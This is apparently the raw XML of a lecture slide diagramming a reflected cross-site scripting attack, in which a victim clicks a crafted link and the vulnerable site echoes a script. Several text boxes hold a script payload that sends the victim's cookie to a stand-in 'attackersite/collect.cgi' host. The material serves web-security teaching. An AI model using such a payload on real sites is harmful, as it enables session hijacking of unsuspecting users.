            <a:ext cx="1108348" cy="496701"/>
          </a:xfrm>
          <a:prstGeom prst="rect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dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ttacker</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="群組 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596452" y="2285994"/>
            <a:ext cx="3476010" cy="371949"/>
            <a:chOff x="4604640" y="2143116"/>
            <a:chExt cx="3511550" cy="431529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5000628" y="2146152"/>
              <a:ext cx="2754720" cy="428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 smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 2. </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Set-Cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ID=A12345</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604640" y="2143116"/>
              <a:ext cx="351155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prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="群組 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1006667" y="5209302"/>
            <a:ext cx="3422457" cy="1077218"/>
            <a:chOff x="1015735" y="4923550"/>
            <a:chExt cx="3505200" cy="1249768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1071539" y="4923550"/>
              <a:ext cx="3357586" cy="1249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b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>7</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>http://attackersite/collect.cgi?cookie=ID=A12345</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>(cookie stolen by the attacker)</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Line 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1015735" y="4929198"/>
              <a:ext cx="3505200" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="E46C0A"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="群組 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4601926" y="1857364"/>
            <a:ext cx="3470536" cy="369332"/>
            <a:chOff x="4610990" y="1643050"/>
            <a:chExt cx="3505200" cy="428493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4610990" y="1643050"/>
              <a:ext cx="350520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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5037790" y="1643050"/>
              <a:ext cx="1840172" cy="428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 smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>1. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Logon request</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4739159" y="6371718"/>
            <a:ext cx="656794" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="E46C0A"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1160269" y="6358229"/>
            <a:ext cx="656794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latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5478058" y="6204942"/>
            <a:ext cx="327509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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>message Victim unaware of</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="703063" y="6260298"/>
            <a:ext cx="7655151" cy="242456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq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zh-TW" altLang="en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4014144" y="1243415"/>
            <a:ext cx="1108348" cy="496701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0000FF">
                  <a:shade val="30000"/>
                  <a:satMod val="115000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="0000FF">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0000FF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dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7613340" y="1247517"/>
            <a:ext cx="1108348" cy="496701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0000FF">
                  <a:shade val="30000"/>
                  <a:satMod val="115000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="0000FF">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0000FF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dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Website</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="群組 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="993190" y="2428870"/>
            <a:ext cx="3435934" cy="646331"/>
            <a:chOff x="1000100" y="2425479"/>
            <a:chExt cx="3505200" cy="749861"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1071538" y="2425479"/>
              <a:ext cx="3433762" cy="7498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 smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>3. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Request by c</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>licking unwittingly a link to </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ttacker’s site</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1000100" y="2428868"/>
              <a:ext cx="350520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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="直線接點 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="-1255422" y="3956362"/>
            <a:ext cx="4429156" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625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7" name="直線接點 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5942970" y="3942714"/>
            <a:ext cx="4429156" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="群組 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4184317" y="4803221"/>
            <a:ext cx="3837994" cy="1483301"/>
            <a:chOff x="4184672" y="4500570"/>
            <a:chExt cx="3931518" cy="1720897"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4184672" y="4543208"/>
              <a:ext cx="3858339" cy="1678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1"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>6</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;HTML&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;Title&gt;Welcome!&lt;/Title&gt;Hi </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>window.open</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>http://attackersite/collect.cgi?cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> =</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>+</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>document.cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Line 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604640" y="4500570"/>
              <a:ext cx="351155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 type="triangle" w="med" len="med"/>
              <a:tailEnd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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="直線接點 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2343774" y="3929066"/>
            <a:ext cx="4429156" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="群組 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="993191" y="3051501"/>
            <a:ext cx="3507372" cy="1493136"/>
            <a:chOff x="993190" y="3323425"/>
            <a:chExt cx="7079272" cy="1094180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1071538" y="3357563"/>
              <a:ext cx="6929485" cy="10600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1"/>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>4. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;HTML&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;a </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>href</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>=‘http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>v</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ulnerablesite/welcome.cgi? name=</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;script&gt;window.open(%27</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>http://</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>attackersite</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>collect.cgi?cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
